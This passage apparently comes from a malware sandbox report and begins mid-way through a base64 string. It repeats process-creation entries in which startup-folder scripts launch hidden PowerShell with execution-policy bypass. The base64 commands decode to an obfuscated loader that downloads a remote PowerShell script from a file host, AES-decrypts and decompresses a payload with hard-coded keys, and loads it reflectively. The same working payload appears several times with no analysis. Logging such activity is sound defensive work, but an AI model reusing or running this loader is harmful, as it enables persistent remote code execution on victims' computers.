CSR3b3JidC5EaXNwb3NlKCk7CSRobmN1YS5EaXNwb3NlKCk7CSRobmN1YS5Ub0FycmF5KCk7fWZ1bmN0aW9uIGdtdm1yKCRwYXJhbV92YXIsJHBhcmFtMl92YXIpewlJRVggJyR2cHh2aT1bU3lzdGVtLlJBQkNlQUJDZmxBQkNlY3RBQkNpb0FCQ24uQUJDQXNBQkNzZUFCQ21iQUJDbEFCQ3lBQkNdOjpMQUJDb0FCQ2FBQkNkQUJDKFtieXRlW11dJHBhcmFtX3Zhcik7Jy5SZXBsYWNlKCdBQkMnLCAnJyk7CUlFWCAnJGFibmt0PSR2cHh2aS5BQkNFQUJDbkFCQ3RBQkNyQUJDeUFCQ1BBQkNvQUJDaUFCQ25BQkN0QUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRhYm5rdC5BQkNJQUJDbkFCQ3ZBQkNvQUJDa0FCQ2VBQkMoJG51bGwsICRwYXJhbTJfdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTt9JG9udCA9ICRlbnY6VVNFUk5BTUU7JG5zb3RnID0gJ0M6XFVzZXJzXCcgKyAkb250ICsgJ0FCQ1xBQkNkQUJDd0FCQ21BQkMuQUJDYkFCQ2FBQkN0QUJDJy5SZXBsYWNlKCdBQkMnLCAnJyk7JGhvc3QuVUkuUmF3VUkuV2luZG93VGl0bGUgPSAkbnNvdGc7JG5raWt4PVtTeXN0ZW0uSU8uRmlsZV06OigndHhlVGxsQWRhZVInWy0xLi4tMTFdIC1qb2luICcnKSg
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_f0ceb41b.cmd"
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4ICgoaWV4ICgoJ2lNSUNST1NPRlRTRVJWSUNFVVBEQVRFU3dyIC1NSUNST1NPRlRTRVJWSUNFVVBEQVRFU1VzZUJNSUNST1NPRlRTRVJWSUNFVVBEQVRFU2FzaWNQTUlDUk9TT0ZUU0VSVklDRVVQREFURVNhcnNpbmcgIk1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTaE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTcE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTc01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTOi8vMHhNSUNST1NPRlRTRVJWSUNFVVBEQVRFUzAuc3QvTUlDUk9TT0ZUU0VSVklDRVVQREFURVM4S01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdVYucHMxIicpLlJlcGxhY2UoJ01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTJywnJykpKS5Db250ZW50KTtmdW5jdGlvbiBsbHF1dCgkcGFyYW1fdmFyKXsJJGFlc192YXI9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQWVzXTo6Q3JlYXRlKCk7CSRhZXNfdmFyLk1vZGU9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQ2lwaGVyTW9kZV06OkNCQzsJJGFlc192YXIuUGFkZGluZz1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5QYWRkaW5nTW9kZV06OlBLQ1M3OwkkYWVzX3Zhci5LZXk9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnNWdDOWlvTUpXT2I1N0x3SEVHa3B3WmhtTlZwN0ZMdzhpNXJxTGJ4MElxWT0nKTsJJGFlc192YXIuSVY9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnL0lVRjExNmJ2NUp6MHVFSGZ0Q2ZMUT09Jyk7CSRkZWNyeXB0b3JfdmFyPSRhZXNfdmFyLkNyZWF0ZURlY3J5cHRvcigpOwkkcmV0dXJuX3Zhcj0kZGVjcnlwdG9yX3Zhci5UcmFuc2Zvcm1GaW5hbEJsb2NrKCRwYXJhbV92YXIsIDAsICRwYXJhbV92YXIuTGVuZ3RoKTsJJGRlY3J5cHRvcl92YXIuRGlzcG9zZSgpOwkkYWVzX3Zhci5EaXNwb3NlKCk7CSRyZXR1cm5fdmFyO31mdW5jdGlvbiBwb2N4YSgkcGFyYW1fdmFyKXsJSUVYICckd29yYnQ9TmV3LU9iamVjdCBTeXN0ZW0uSU8uTUFCQ2VtQUJDb3JBQkN5U0FCQ3RyQUJDZWFBQkNtKCwkcGFyYW1fdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTsJSUVYICckaG5jdWE9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQUJDTUFCQ2VBQkNtQUJDb0FCQ3JBQkN5QUJDU0FCQ3RBQkNyQUJDZUFCQ2FBQkNtQUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRmd2RucD1OZXctT2JqZWN0IFN5c3RlbS5JTy5DQUJDb21BQkNwckFCQ2VBQkNzc0FCQ2lvQUJDbi5BQkNHWkFCQ2lwQUJDU3RBQkNyZUFCQ2FtQUJDKCR3b3JidCwgW0lPLkNBQkNvbUFCQ3ByQUJDZXNBQkNzaUFCQ29uQUJDLkNvQUJDbXBBQkNyZUFCQ3NzQUJDaUFCQ29BQkNuQUJDTW9kZV06OkRBQkNlQUJDY0FCQ29tcEFCQ3JlQUJDc3MpOycuUmVwbGFjZSgnQUJDJywgJycpOwkkZndkbnAuQ29weVRvKCRobmN1YSk7CSRmd2RucC5EaXNwb3NlKCk7CSR3b3JidC5EaXNwb3NlKCk7CSRobmN1YS5EaXNwb3NlKCk7CSRobmN1YS5Ub0FycmF5KCk7fWZ1bmN0aW9uIGdtdm1yKCRwYXJhbV92YXIsJHBhcmFtMl92YXIpewlJRVggJyR2cHh2aT1bU3lzdGVtLlJBQkNlQUJDZmxBQkNlY3RBQkNpb0FCQ24uQUJDQXNBQkNzZUFCQ21iQUJDbEFCQ3lBQkNdOjpMQUJDb0FCQ2FBQkNkQUJDKFtieXRlW11dJHBhcmFtX3Zhcik7Jy5SZXBsYWNlKCdBQkMnLCAnJyk7CUlFWCAnJGFibmt0PSR2cHh2aS5BQkNFQUJDbkFCQ3RBQkNyQUJDeUFCQ1BBQkNvQUJDaUFCQ25BQkN0QUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRhYm5rdC5BQkNJQUJDbkFCQ3ZBQkNvQUJDa0FCQ2VBQkMoJG51bGwsICRwYXJhbTJfdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTt9JG9udCA9ICRlbnY6VVNFUk5BTUU7JG5zb3RnID0gJ0M6XFVzZXJzXCcgKyAkb250ICsgJ0FCQ1xBQkNkQUJDd0FCQ21BQkMuQUJDYkFCQ2FBQkN0QUJDJy5SZXBsYWNlKCdBQkMnLCAnJyk7JGhvc3QuVUkuUmF3VUkuV2luZG93VGl0bGUgPSAkbnNvdGc7JG5raWt4PVtTeXN0ZW0uSU8uRmlsZV06OigndHhlVGxsQWRhZVInWy0xLi4tMTFdIC1qb2luICcnKSg
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_2513bab9.cmd"
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4ICgoaWV4ICgoJ2lNSUNST1NPRlRTRVJWSUNFVVBEQVRFU3dyIC1NSUNST1NPRlRTRVJWSUNFVVBEQVRFU1VzZUJNSUNST1NPRlRTRVJWSUNFVVBEQVRFU2FzaWNQTUlDUk9TT0ZUU0VSVklDRVVQREFURVNhcnNpbmcgIk1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTaE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTcE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTc01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTOi8vMHhNSUNST1NPRlRTRVJWSUNFVVBEQVRFUzAuc3QvTUlDUk9TT0ZUU0VSVklDRVVQREFURVM4S01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdVYucHMxIicpLlJlcGxhY2UoJ01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTJywnJykpKS5Db250ZW50KTtmdW5jdGlvbiBsbHF1dCgkcGFyYW1fdmFyKXsJJGFlc192YXI9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQWVzXTo6Q3JlYXRlKCk7CSRhZXNfdmFyLk1vZGU9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQ2lwaGVyTW9kZV06OkNCQzsJJGFlc192YXIuUGFkZGluZz1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5QYWRkaW5nTW9kZV06OlBLQ1M3OwkkYWVzX3Zhci5LZXk9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnNWdDOWlvTUpXT2I1N0x3SEVHa3B3WmhtTlZwN0ZMdzhpNXJxTGJ4MElxWT0nKTsJJGFlc192YXIuSVY9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnL0lVRjExNmJ2NUp6MHVFSGZ0Q2ZMUT09Jyk7CSRkZWNyeXB0b3JfdmFyPSRhZXNfdmFyLkNyZWF0ZURlY3J5cHRvcigpOwkkcmV0dXJuX3Zhcj0kZGVjcnlwdG9yX3Zhci5UcmFuc2Zvcm1GaW5hbEJsb2NrKCRwYXJhbV92YXIsIDAsICRwYXJhbV92YXIuTGVuZ3RoKTsJJGRlY3J5cHRvcl92YXIuRGlzcG9zZSgpOwkkYWVzX3Zhci5EaXNwb3NlKCk7CSRyZXR1cm5fdmFyO31mdW5jdGlvbiBwb2N4YSgkcGFyYW1fdmFyKXsJSUVYICckd29yYnQ9TmV3LU9iamVjdCBTeXN0ZW0uSU8uTUFCQ2VtQUJDb3JBQkN5U0FCQ3RyQUJDZWFBQkNtKCwkcGFyYW1fdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTsJSUVYICckaG5jdWE9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQUJDTUFCQ2VBQkNtQUJDb0FCQ3JBQkN5QUJDU0FCQ3RBQkNyQUJDZUFCQ2FBQkNtQUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRmd2RucD1OZXctT2JqZWN0IFN5c3RlbS5JTy5DQUJDb21BQkNwckFCQ2VBQkNzc0FCQ2lvQUJDbi5BQkNHWkFCQ2lwQUJDU3RBQkNyZUFCQ2FtQUJDKCR3b3JidCwgW0lPLkNBQkNvbUFCQ3ByQUJDZXNBQkNzaUFCQ29uQUJDLkNvQUJDbXBBQkNyZUFCQ3NzQUJDaUFCQ29BQkNuQUJDTW9kZV06OkRBQkNlQUJDY0FCQ29tcEFCQ3JlQUJDc3MpOycuUmVwbGFjZSgnQUJDJywgJycpOwkkZndkbnAuQ29weVRvKCRobmN1YSk7CSRmd2RucC5EaXNwb3NlKCk7CSR3b3JidC5EaXNwb3NlKCk7CSRobmN1YS5EaXNwb3NlKCk7CSRobmN1YS5Ub0FycmF5KCk7fWZ1bmN0aW9uIGdtdm1yKCRwYXJhbV92YXIsJHBhcmFtMl92YXIpewlJRVggJyR2cHh2aT1bU3lzdGVtLlJBQkNlQUJDZmxBQkNlY3RBQkNpb0FCQ24uQUJDQXNBQkNzZUFCQ21iQUJDbEFCQ3lBQkNdOjpMQUJDb0FCQ2FBQkNkQUJDKFtieXRlW11dJHBhcmFtX3Zhcik7Jy5SZXBsYWNlKCdBQkMnLCAnJyk7CUlFWCAnJGFibmt0PSR2cHh2aS5BQkNFQUJDbkFCQ3RBQkNyQUJDeUFCQ1BBQkNvQUJDaUFCQ25BQkN0QUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRhYm5rdC5BQkNJQUJDbkFCQ3ZBQkNvQUJDa0FCQ2VBQkMoJG51bGwsICRwYXJhbTJfdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTt9JG9udCA9ICRlbnY6VVNFUk5BTUU7JG5zb3RnID0gJ0M6XFVzZXJzXCcgKyAkb250ICsgJ0FCQ1xBQkNkQUJDd0FCQ21BQkMuQUJDYkFCQ2FBQkN0QUJDJy5SZXBsYWNlKCdBQkMnLCAnJyk7JGhvc3QuVUkuUmF3VUkuV2luZG93VGl0bGUgPSAkbnNvdGc7JG5raWt4PVtTeXN0ZW0uSU8uRmlsZV06OigndHhlVGxsQWRhZVInWy0xLi4tMTFdIC1qb2luICcnKSg
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_2c46f0ee.cmd"
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4ICgoaWV4ICgoJ2lNSUNST1NPRlRTRVJWSUNFVVBEQVRFU3dyIC1NSUNST1NPRlRTRVJWSUNFVVBEQVRFU1VzZUJNSUNST1NPRlRTRVJWSUNFVVBEQVRFU2FzaWNQTUlDUk9TT0ZUU0VSVklDRVVQREFURVNhcnNpbmcgIk1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTaE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTcE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTc01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTOi8vMHhNSUNST1NPRlRTRVJWSUNFVVBEQVRFUzAuc3QvTUlDUk9TT0ZUU0VSVklDRVVQREFURVM4S01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdVYucHMxIicpLlJlcGxhY2UoJ01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTJywnJykpKS5Db250ZW50KTtmdW5jdGlvbiBsbHF1dCgkcGFyYW1fdmFyKXsJJGFlc192YXI9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQWVzXTo6Q3JlYXRlKCk7CSRhZXNfdmFyLk1vZGU9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQ2lwaGVyTW9kZV06OkNCQzsJJGFlc192YXIuUGFkZGluZz1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5QYWRkaW5nTW9kZV06OlBLQ1M3OwkkYWVzX3Zhci5LZXk9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnNWdDOWlvTUpXT2I1N0x3SEVHa3B3WmhtTlZwN0ZMdzhpNXJxTGJ4MElxWT0nKTsJJGFlc192YXIuSVY9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnL0lVRjExNmJ2NUp6MHVFSGZ0Q2ZMUT09Jyk7CSRkZWNyeXB0b3JfdmFyPSRhZXNfdmFyLkNyZWF0ZURlY3J5cHRvcigpOwkkcmV0dXJuX3Zhcj0kZGVjcnlwdG9yX3Zhci5UcmFuc2Zvcm1GaW5hbEJsb2NrKCRwYXJhbV92YXIsIDAsICRwYXJhbV92YXIuTGVuZ3RoKTsJJGRlY3J5cHRvcl92YXIuRGlzcG9zZSgpOwkkYWVzX3Zhci5EaXNwb3NlKCk7CSRyZXR1cm5fdmFyO31mdW5jdGlvbiBwb2N4YSgkcGFyYW1fdmFyKXsJSUVYICckd29yYnQ9TmV3LU9iamVjdCBTeXN0ZW0uSU8uTUFCQ2VtQUJDb3JBQkN5U0FCQ3RyQUJDZWFBQkNtKCwkcGFyYW1fdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTsJSUVYICckaG5jdWE9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQUJDTUFCQ2VBQkNtQUJDb0FCQ3JBQkN5QUJDU0FCQ3RBQkNyQUJDZUFCQ2FBQkNtQUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRmd2RucD1OZXctT2JqZWN0IFN5c3RlbS5JTy5DQUJDb21BQkNwckFCQ2VBQkNzc0FCQ2lvQUJDbi5BQkNHWkFCQ2lwQUJDU3RBQkNyZUFCQ2FtQUJDKCR3b3JidCwgW0lPLkNBQkNvbUFCQ3ByQUJDZXNBQkNzaUFCQ29uQUJDLkNvQUJDbXBBQkNyZUFCQ3NzQUJDaUFCQ29BQkNuQUJDTW9kZV06OkRBQkNlQUJDY0FCQ29tcEFCQ3JlQUJDc3MpOycuUmVwbGFjZSgnQUJDJywgJycpOwkkZndkbnAuQ29weVRvKCRobmN1YSk7CSRmd2RucC5EaXNwb3NlKCk7CSR3b3JidC5EaXNwb3NlKCk7CSRobmN1YS5EaXNwb3NlKCk7CSRobmN1YS5Ub0FycmF5KCk7fWZ1bmN0aW9uIGdtdm1yKCRwYXJhbV92YXIsJHBhcmFtMl92YXIpewlJRVggJyR2cHh2aT1bU3lzdGVtLlJBQkNlQUJDZmxBQkNlY3RBQkNpb0FCQ24uQUJDQXNBQkNzZUFCQ21iQUJDbEFCQ3lBQkNdOjpMQUJDb0FCQ2FBQkNkQUJDKFtieXRlW11dJHBhcmFtX3Zhcik7Jy5SZXBsYWNlKCdBQkMnLCAnJyk7CUlFWCAnJGFibmt0PSR2cHh2aS5BQkNFQUJDbkFCQ3RBQkNyQUJDeUFCQ1BBQkNvQUJDaUFCQ25BQkN0QUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRhYm5rdC5BQkNJQUJDbkFCQ3ZBQkNvQUJDa0FCQ2VBQkMoJG51bGwsICRwYXJhbTJfdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTt9JG9udCA9ICRlbnY6VVNFUk5BTUU7JG5zb3RnID0gJ0M6XFVzZXJzXCcgKyAkb250ICsgJ0FCQ1xBQkNkQUJDd0FCQ21BQkMuQUJDYkFCQ2FBQkN0QUJDJy5SZXBsYWNlKCdBQkMnLCAnJyk7JGhvc3QuVUkuUmF3VUkuV2luZG93VGl0bGUgPSAkbnNvdGc7JG5raWt4PVtTeXN0ZW0uSU8uRmlsZV06OigndHhlVGxsQWRhZVInWy0xLi4tMTFdIC1qb2luICcnKSg
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_b6e52985.cmd"
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4ICgoaWV4ICgoJ2lNSUNST1NPRlRTRVJWSUNFVVBEQVRFU3dyIC1NSUNST1NPRlRTRVJWSUNFVVBEQVRFU1VzZUJNSUNST1NPRlRTRVJWSUNFVVBEQVRFU2FzaWNQTUlDUk9TT0ZUU0VSVklDRVVQREFURVNhcnNpbmcgIk1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTaE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTcE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTc01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTOi8vMHhNSUNST1NPRlRTRVJWSUNFVVBEQVRFUzAuc3QvTUlDUk9TT0ZUU0VSVklDRVVQREFURVM4S01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdVYucHMxIicpLlJlcGxhY2UoJ01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTJywnJykpKS5Db250ZW50KTtmdW5jdGlvbiBsbHF1dCgkcGFyYW1fdmFyKXsJJGFlc192YXI9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQWVzXTo6Q3JlYXRlKCk7CSRhZXNfdmFyLk1vZGU9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQ2lwaGVyTW9kZV06OkNCQzsJJGFlc192YXIuUGFkZGluZz1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5QYWRkaW5nTW9kZV06OlBLQ1M3OwkkYWVzX3Zhci5LZXk9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnNWdDOWlvTUpXT2I1N0x3SEVHa3B3WmhtTlZwN0ZMdzhpNXJxTGJ4MElxWT0nKTsJJGFlc192YXIuSVY9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnL0lVRjExNmJ2NUp6MHVFSGZ0Q2ZMUT09Jyk7CSRkZWNyeXB0b3JfdmFyPSRhZXNfdmFyLkNyZWF0ZURlY3J5cHRvcigpOwkkcmV0dXJuX3Zhcj0kZGVjcnlwdG9yX3Zhci5UcmFuc2Zvcm1GaW5hbEJsb2NrKCRwYXJhbV92YXIsIDAsICRwYXJhbV92YXIuTGVuZ3RoKTsJJGRlY3J5cHRvcl92YXIuRGlzcG9zZSgpOwkkYWVzX3Zhci5EaXNwb3NlKCk7CSRyZXR1cm5fdmFyO31mdW5jdGlvbiBwb2N4YSgkcGFyYW1fdmFyKXsJSUVYICckd29yYnQ9TmV3LU9iamVjdCBTeXN0ZW0uSU8uTUFCQ2VtQUJDb3JBQkN5U0FCQ3RyQUJDZWFBQkNtKCwkcGFyYW1fdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTsJSUVYICckaG5jdWE9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQUJDTUFCQ2VBQkNtQUJDb0FCQ3JBQkN5QUJDU0FCQ3RBQkNyQUJDZUFCQ2FBQkNtQUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRmd2RucD1OZXctT2JqZWN0IFN5c3RlbS5JTy5DQUJDb21BQkNwckFCQ2VBQkNzc0FCQ2lvQUJDbi5BQkNHWkFCQ2lwQUJDU3RBQkNyZUFCQ2FtQUJDKCR3b3JidCwgW0lPLkNBQkNvbUFCQ3ByQUJDZXNBQkNzaUFCQ29uQUJDLkNvQUJDbXBBQkNyZUFCQ3NzQUJDaUFCQ29BQkNuQUJDTW9kZV06OkRBQkNlQUJDY0FCQ29tcEFCQ3JlQUJDc3MpOycuUmVwbGFjZSgnQUJDJywgJycpOwkkZndkbnAuQ29weVRvKCRobmN1YSk7CSRmd2RucC5EaXNwb3NlKCk7CSR3b3JidC5EaXNwb3NlKCk7CSRobmN1YS5EaXNwb3NlKCk7CSRobmN1YS5Ub0FycmF5KCk7fWZ1bmN0aW9uIGdtdm1yKCRwYXJhbV92YXIsJHBhcmFtMl92YXIpewlJRVggJyR2cHh2aT1bU3lzdGVtLlJBQkNlQUJDZmxBQkNlY3RBQkNpb0FCQ24uQUJDQXNBQkNzZUFCQ21iQUJDbEFCQ3lBQkNdOjpMQUJDb0FCQ2FBQkNkQUJDKFtieXRlW11dJHBhcmFtX3Zhcik7Jy5SZXBsYWNlKCdBQkMnLCAnJyk7CUlFWCAnJGFibmt0PSR2cHh2aS5BQkNFQUJDbkFCQ3RBQkNyQUJDeUFCQ1BBQkNvQUJDaUFCQ25BQkN0QUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRhYm5rdC5BQkNJQUJDbkFCQ3ZBQkNvQUJDa0FCQ2VBQkMoJG51bGwsICRwYXJhbTJfdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTt9JG9udCA9ICRlbnY6VVNFUk5BTUU7JG5zb3RnID0gJ0M6XFVzZXJzXCcgKyAkb250ICsgJ0FCQ1xBQkNkQUJDd0FCQ21BQkMuQUJDYkFCQ2FBQkN0QUJDJy5SZXBsYWNlKCdBQkMnLCAnJyk7JGhvc3QuVUkuUmF3VUkuV2luZG93VGl0bGUgPSAkbnNvdGc7JG5raWt4PVtTeXN0ZW0uSU8uRmlsZV06OigndHhlVGxsQWRhZVInWy0xLi4tMTFdIC1qb2luICcnKSg
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_cad7c66e.cmd"
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4ICgoaWV4ICgoJ2lNSUNST1NPRlRTRVJWSUNFVVBEQVRFU3dyIC1NSUNST1NPRlRTRVJWSUNFVVBEQVRFU1VzZUJNSUNST1NPRlRTRVJWSUNFVVBEQVRFU2FzaWNQTUlDUk9TT0ZUU0VSVklDRVVQREFURVNhcnNpbmcgIk1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTaE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTcE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTc01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTOi8vMHhNSUNST1NPRlRTRVJWSUNFVVBEQVRFUzAuc3QvTUlDUk9TT0ZUU0VSVklDRVVQREFURVM4S01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdVYucHMxIicpLlJlcGxhY2UoJ01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTJywnJykpKS5Db250ZW50KTtmdW5jdGlvbiBsbHF1dCgkcGFyYW1fdmFyKXsJJGFlc192YXI9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQWVzXTo6Q3JlYXRlKCk7CSRhZXNfdmFyLk1vZGU9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQ2lwaGVyTW9kZV06OkNCQzsJJGFlc192YXIuUGFkZGluZz1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5QYWRkaW5nTW9kZV06OlBLQ1M3OwkkYWVzX3Zhci5LZXk9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnNWdDOWlvTUpXT2I1N0x3SEVHa3B3WmhtTlZwN0ZMdzhpNXJxTGJ4MElxWT0nKTsJJGFlc192YXIuSVY9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnL0lVRjExNmJ2NUp6MHVFSGZ0Q2ZMUT09Jyk7CSRkZWNyeXB0b3JfdmFyPSRhZXNfdmFyLkNyZWF0ZURlY3J5cHRvcigpOwkkcmV0dXJuX3Zhcj0kZGVjcnlwdG9yX3Zhci5UcmFuc2Zvcm1GaW5hbEJsb2NrKCRwYXJhbV92YXIsIDAsICRwYXJhbV92YXIuTGVuZ3RoKTsJJGRlY3J5cHRvcl92YXIuRGlzcG9zZSgpOwkkYWVzX3Zhci5EaXNwb3NlKCk7CSRyZXR1cm5fdmFyO31mdW5jdGlvbiBwb2N4YSgkcGFyYW1fdmFyKXsJSUVYICckd29yYnQ9TmV3LU9iamVjdCBTeXN0ZW0uSU8uTUFCQ2VtQUJDb3JBQkN5U0FCQ3RyQUJDZWFBQkNtKCwkcGFyYW1fdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTsJSUVYICckaG5jdWE9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQUJDTUFCQ2VBQkNtQUJDb0FCQ3JBQkN5QUJDU0FCQ3RBQkNyQUJDZUFCQ2FBQkNtQUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRmd2RucD1OZXctT2JqZWN0IFN5c3RlbS5JTy5DQUJDb21BQkNwckFCQ2VBQkNzc0FCQ2lvQUJDbi5BQkNHWkFCQ2lwQUJDU3RBQkNyZUFCQ2FtQUJDKCR3b3JidCwgW0lPLkNBQkNvbUFCQ3ByQUJDZXNBQkNzaUFCQ29uQUJDLkNvQUJDbXBBQkNyZUFCQ3NzQUJDaUFCQ29BQkNuQUJDTW9kZV06OkRBQkNlQUJDY0FCQ29tcEFCQ3JlQUJDc3MpOycuUmVwbGFjZSgnQUJDJywgJycpOwkkZndkbnAuQ29weVRvKCRobmN1YSk7CSRmd2RucC5EaXNwb3NlKCk7CSR3b3JidC5EaXNwb3NlKCk7CSRobmN1YS5EaXNwb3NlKCk7CSRobmN1YS5Ub0